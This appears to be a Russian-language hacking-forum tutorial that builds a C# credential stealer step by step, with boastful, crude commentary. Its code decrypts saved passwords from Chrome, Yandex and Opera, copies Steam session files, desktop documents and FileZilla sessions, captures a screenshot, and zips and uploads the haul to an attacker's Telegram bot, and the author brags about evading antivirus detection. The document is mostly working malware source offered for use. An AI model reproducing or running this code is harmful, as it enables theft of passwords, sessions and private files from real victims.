Привет, хацкер, сегодня мы будем писать свой стиллер на шарпике.
Итак, прежде чем мы приступим, хотел бы рассказать тебе о возможностях нашего стиллера:
Время кодинга, сучки!
Создаём консольное приложение, версия фреймворка - 4.5
Сразу установим две нужные нам библиотеки - DotNetZip, System.Data.SQLite.
Добавляем ссылку System.Security, System.Windows.Forms и System.Drawing
Добавим необходимые юзинги:
Объявим глобальные переменные, в которых содержатся пути папок:
Добавляем переменную, которое хранит имя ПК:
Создаём переменную workdir, в которой мы будем работать с файлами:
Создаём переменные, которые содержат IP и HWID компьютера:
Объявим две переменные, в которых будут содержатся данные для отправки лога в телеграм: Token и ID
Создадим пустую переменную, в которой будут содержатся пароли:
Создаём папки, для копирования файлов:
Создаём переменную dir, в которой содержатся пути до браузеров:
Теперь нам нужно пройти по папкам, и собрать логины и пароли из браузеров:
На этом этапе появятся ошибки, для их исправления создаём новый класс - Passwords.cs
Код класса (Passwords):
Теперь ошибок нет, двигаемся дальше.
Сейчас мы добавляем граббинг файлов Steam'a. Для этого создаём две переменные steamdir и cfgdir.
Теперь копируем файлы из папки config, в нашу подпапку Steam:
Теперь копируем ssfn файлы для авторизации без логина и пароля:
Теперь сделаем граббер файлов с рабочего стола. Объявляем две переменные: desktop - которая содержит путь до Рабочего Стола, и files - которая содержит за файлы, которые там находятся.
Создаём списки, отсеиваем ненужные файлы, добавляем в нашу папку:
Граббер готов. Теперь делаем скриншот экрана:
Воруем сессию FileZilla. Создаём переменную, в которой содержится путь до папки с файлами зиллы:
Пытаемся скопировать файлы:
Базовый функционал готов. Теперь, нам нужно поместить все украденные файлы в архив:
Отправка лога в телеграм бот.
Не стал использовать готовые библиотеки, сделал прямым запросом.
Создаём новый void, добавляем параметры для POST запроса:
Возращаемся к Main'у. Создаём переменную LOG, которая содержит путь до архива:
Делаем запрос:
Всё стиллер готов. Проверяем.
Сообщение от бота
Вид лога
Ну, а теперь самое интересное - детект:
Как тебе такое?)
Заключение.
Сейчас с уверенностью могу сказать, что мы поимели половину кодеров очередного школо-форума.
Код не идеален, на это есть много причин: почти весь функционал прописан в Main'e, хотя можно было создать классы, для удобства; мы использовали sqlite для расшифровки паролей, хотя можно было использовать движок sqlhandler, с которым не было бы подгрузки необходимой dll'ки.
В следующих статьях я проведу рефакторинг. Код станет меньше быть похож на говнецо (но это не точно).
Что планирую добавить?
Скачать исходники: LINK
Итак, прежде чем мы приступим, хотел бы рассказать тебе о возможностях нашего стиллера:
- Стиллинг паролей из браузеров (Chrome, Opera, Yandex (старая версия))
- Грабинг сессии Steam. (vdf и ssfn файлы)
- Грабинг файлов с рабочего стола .txt, sql, pdf)
- Грабинг сессии FileZilla
- Отправка логов в телеграм бота
- Вес ~ 15кб
Время кодинга, сучки!
Создаём консольное приложение, версия фреймворка - 4.5
Сразу установим две нужные нам библиотеки - DotNetZip, System.Data.SQLite.
Добавляем ссылку System.Security, System.Windows.Forms и System.Drawing
Добавим необходимые юзинги:
C#:
using Ionic.Zip;
using System;
using System.IO;
using System.Security.Principal;
using System.Drawing;
using System.Collections.Generic;
using System.Text;
using System.Management;
using System.Net;Объявим глобальные переменные, в которых содержатся пути папок:
C#:
static string temp = Path.GetTempPath();
static string LocalAppData = Environment.GetEnvironmentVariable("LocalAppData");
static string AppData = Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData);Добавляем переменную, которое хранит имя ПК:
C#:
static string username = WindowsIdentity.GetCurrent().Name;Создаём переменную workdir, в которой мы будем работать с файлами:
C#:
static string workdir = temp + username;Создаём переменные, которые содержат IP и HWID компьютера:
C#:
static string host = Dns.GetHostName();
static IPAddress IP = Dns.GetHostByName(host).AddressList[0];
static string HWID = "";Объявим две переменные, в которых будут содержатся данные для отправки лога в телеграм: Token и ID
C#:
static string Token = "ТокенОтБота";
static string ID = "ЧатID";Создадим пустую переменную, в которой будут содержатся пароли:
C#:
string text = "";Создаём папки, для копирования файлов:
C#:
Directory.CreateDirectory(temp + username);
Directory.CreateDirectory(workdir + "\\Steam");
Directory.CreateDirectory(workdir + "\\Steam\\ssfn");
Directory.CreateDirectory(workdir + "\\Desktop");
Directory.CreateDirectory(workdir + "\\FileZilla");Создаём переменную dir, в которой содержатся пути до браузеров:
C#:
string[] dir =
{
LocalAppData + @"\Google\Chrome\User Data\Default\Login Data",
LocalAppData + @"\Yandex\YandexBrowser\User Data\Default\Login Data",
AppData + @"\Opera Software\Opera Stable\Login Data"
};Теперь нам нужно пройти по папкам, и собрать логины и пароли из браузеров:
C#:
foreach (string p in dir) //идем по папкам
{
var pas = Passwords.ReadPass(p);
if (File.Exists(p)) // если файл с паролями существует, то выполняем следующие действия
{
text += "Dark $tealer by: @darkside_team\r\n\r\n";
foreach (var item in pas)
{
if ((item.Item2.Length > 0) && (item.Item3.Length > 0)) // если значения логина и пароля не пустые, то заносим их в переменную
{
text += "URL: " + item.Item1 + "\r\n" + "Login: " + item.Item2 + "\r\n" + "Password: " + item.Item3 + "\r\n";
text += " \r\n";
}
}
}
}
File.WriteAllText(temp + @"" + username + "\\Passwords.txt", text); // записываем пароли в файл
File.Delete(temp + @"" + username + "\\Login Data"); // Удаляем лишниеНа этом этапе появятся ошибки, для их исправления создаём новый класс - Passwords.cs
Код класса (Passwords):
C#:
using System;
using System.Collections.Generic;
using System.IO;
using System.Security.Principal;
using System.Text;
namespace Dark__tealer__darkside_team
{
class Passwords
{
static string temp = Path.GetTempPath();
static string username = WindowsIdentity.GetCurrent().Name;
static public IEnumerable<Tuple<string, string, string>> ReadPass(string dbPath)
{
if (File.Exists(temp + @"" + username + "\\Login Data")) // Если файл по данному пути существует, то удаляем его
{
File.Delete(temp + @"" + username + "\\Login Data");
}
File.Copy(dbPath, temp + @"" + username + "\\Login Data"); // копируем файл с паролями для того, чтобы не закрывать браузер
dbPath = temp + @"" + username + "\\Login Data";
var connectionString = "Data Source=" + dbPath + ";pooling=false";
using (var conn = new System.Data.SQLite.SQLiteConnection(connectionString))
using (var cmd = conn.CreateCommand())
{
cmd.CommandText = "SELECT password_value,username_value,origin_url FROM logins";
conn.Open();
using (var reader = cmd.ExecuteReader())
{
while (reader.Read())
{
var encryptedData = (byte[])reader[0];
var decodedData = System.Security.Cryptography.ProtectedData.Unprotect(encryptedData, null, System.Security.Cryptography.DataProtectionScope.CurrentUser); // расшифровка паролей
var plainText = Encoding.ASCII.GetString(decodedData);
yield return Tuple.Create(reader.GetString(2), reader.GetString(1), plainText);
}
}
conn.Close();
}
}
}
}Теперь ошибок нет, двигаемся дальше.
Сейчас мы добавляем граббинг файлов Steam'a. Для этого создаём две переменные steamdir и cfgdir.
C#:
string steamdir = (string)Microsoft.Win32.Registry.GetValue(@"HKEY_CURRENT_USER\SOFTWARE\Valve\Steam", "Steampath", null); // Ищем папку стима через реестр
string cfgdir = steamdir + "\\config"; // Добавляем переменную для папки configТеперь копируем файлы из папки config, в нашу подпапку Steam:
C#:
DirectoryInfo dirInfo = new DirectoryInfo(cfgdir); // Создаём переменную dirInfi
foreach (FileInfo file in dirInfo.GetFiles("*.*")) // Указываем, что копируем все файлы
{
File.Copy(file.FullName, workdir + "\\Steam" + "\\" + file.Name, true); // Копируем
}Теперь копируем ssfn файлы для авторизации без логина и пароля:
C#:
DirectoryInfo dirInfo1 = new DirectoryInfo(steamdir);
foreach (FileInfo file1 in dirInfo1.GetFiles("ssfn*")) // Указываем, что копируем только файлы начинающиеся с ssfn
{
File.Copy(file1.FullName, workdir + "\\Steam\\ssfn" + "\\" + file1.Name, true);
}Теперь сделаем граббер файлов с рабочего стола. Объявляем две переменные: desktop - которая содержит путь до Рабочего Стола, и files - которая содержит за файлы, которые там находятся.
C#:
string desktop = Environment.GetFolderPath(Environment.SpecialFolder.Desktop); ;
string[] files = Directory.GetFiles(desktop);Создаём списки, отсеиваем ненужные файлы, добавляем в нашу папку:
C#:
string desktop = Environment.GetFolderPath(Environment.SpecialFolder.Desktop); ;
string[] files = Directory.GetFiles(desktop);
Создаём списки, отсеиваем ненужные файлы, добавляем в нашу папку:
List<string> listFiles = new List<string>(); // Список
foreach (string i in files)
{
string extens = Path.GetExtension(i); // Переменная отвечающая за расширения файлов
if (extens == ".pdf" || extens == ".txt" || extens == ".sql") // Проверка расширения
{
listFiles.Add(i); // Добавляем файл в список, если прошёл проверку
}
}
List<string> names = new List<string>(); // Список
foreach (string i in listFiles)
{
names.Add(Path.GetFileName(i)); // Имя файла
}
for (int i = 0; i < listFiles.Count; i++)
{
if (File.Exists(Path.Combine(workdir + "\\Desktop", names[i]))) // Если файл существует
File.Delete(Path.Combine(workdir + "\\Desktop", names[i])); // Удаляем
File.Copy(listFiles[i], Path.Combine(workdir + "\\Desktop", names[i])); // Копируем файлы из списка в нашу подпапку DesktopГраббер готов. Теперь делаем скриншот экрана:
C#:
Bitmap Screenshot;
int width = int.Parse(System.Windows.Forms.Screen.PrimaryScreen.Bounds.Width.ToString());
int height = int.Parse(System.Windows.Forms.Screen.PrimaryScreen.Bounds.Width.ToString());
Screenshot = new Bitmap(1920, 1080); // Расширение скриншота
Size s = new Size(Screenshot.Width, Screenshot.Height); // Размер
Graphics memoryGraphics = Graphics.FromImage(Screenshot);
memoryGraphics.CopyFromScreen(0, 0, 0, 0, s);
string screenpath = workdir + "\\Screen.jpg"; // Папка для сохранения
Screenshot.Save(screenpath); // СохраняемВоруем сессию FileZilla. Создаём переменную, в которой содержится путь до папки с файлами зиллы:
C#:
string FileZilla = AppData + "\\FileZilla";Пытаемся скопировать файлы:
C#:
try
{
DirectoryInfo dirInfo2 = new DirectoryInfo(FileZilla);
foreach (FileInfo file1 in dirInfo2.GetFiles("*.xml")) // Ограничение, только файлы с расширением xml
{
File.Copy(file1.FullName, workdir + "\\FileZilla" + "\\" + file1.Name, true); // Копируем
}
}
catch { }Базовый функционал готов. Теперь, нам нужно поместить все украденные файлы в архив:
C#:
using (ZipFile zip = new ZipFile(Encoding.GetEncoding("cp866"))) // Устанавливаем кодировку
{
zip.CompressionLevel = Ionic.Zlib.CompressionLevel.BestCompression; // Задаем максимальную степень сжатия
zip.Comment = "Dark $tealer by https://t.me/darkside_team" + // Добавляем комментарий к архиву
"\n<========================================>" +
"\nPC:" + username +
"\nIP: " + IP +
"\nHWID: " + HWID +
"\nGovnoCode by: 3xpl01t | @exploit_dar"
;
zip.Password = "DARK"; // Задаём пароль
zip.AddDirectory(@"" + temp + username); // Кладем в архив папку вместе с содежимым
zip.Save(@"" + temp + username + "@darkside_team.zip"); // Сохраняем архив
}Отправка лога в телеграм бот.
Не стал использовать готовые библиотеки, сделал прямым запросом.
Создаём новый void, добавляем параметры для POST запроса:
C#:
private static void UploadMultipart(byte[] file, string filename, string contentType, string url)
{
try
{
WebClient webClient = new WebClient();
string text = "------------------------" + DateTime.Now.Ticks.ToString("x");
webClient.Headers.Add("Content-Type", "multipart/form-data; boundary=" + text);
string @string = webClient.Encoding.GetString(file);
string s = string.Format("--{0}\r\nContent-Disposition: form-data; name=\"document\"; filename=\"{1}\"\r\nContent-Type: {2}\r\n\r\n{3}\r\n--{0}--\r\n", new object[]
{
text,
filename,
contentType,
@string
});
byte[] bytes = webClient.Encoding.GetBytes(s);
webClient.UploadData(url, "POST", bytes);
Environment.Exit(0);
}
catch
{
}Возращаемся к Main'у. Создаём переменную LOG, которая содержит путь до архива:
C#:
string LOG = @"" + temp + username + "@darkside_team.zip";
byte[] file = File.ReadAllBytes(LOG);
string url = string.Concat(new string[]Делаем запрос:
C#:
{
"https://api.telegram.org/bot",
Token,
"/sendDocument?chat_id=",
ID,
"&caption=NEW LOG! ⚡️" +
"\nPC: " + username +
"\nIP: " + IP +
"\nPassword: DARK" +
"\nCoded by @darkside_team"
});
UploadMultipart(file, LOG, "application/x-ms-dos-executable", url);
return;Всё стиллер готов. Проверяем.
Сообщение от бота
Вид лога
Ну, а теперь самое интересное - детект:
Как тебе такое?)
Заключение.
Сейчас с уверенностью могу сказать, что мы поимели половину кодеров очередного школо-форума.
Код не идеален, на это есть много причин: почти весь функционал прописан в Main'e, хотя можно было создать классы, для удобства; мы использовали sqlite для расшифровки паролей, хотя можно было использовать движок sqlhandler, с которым не было бы подгрузки необходимой dll'ки.
В следующих статьях я проведу рефакторинг. Код станет меньше быть похож на говнецо (но это не точно).
Что планирую добавить?
- Стиллинг куки
- Chromium браузеры
- Автозаполнения браузеров
- Стиллинг сессии Discord
Скачать исходники: LINK
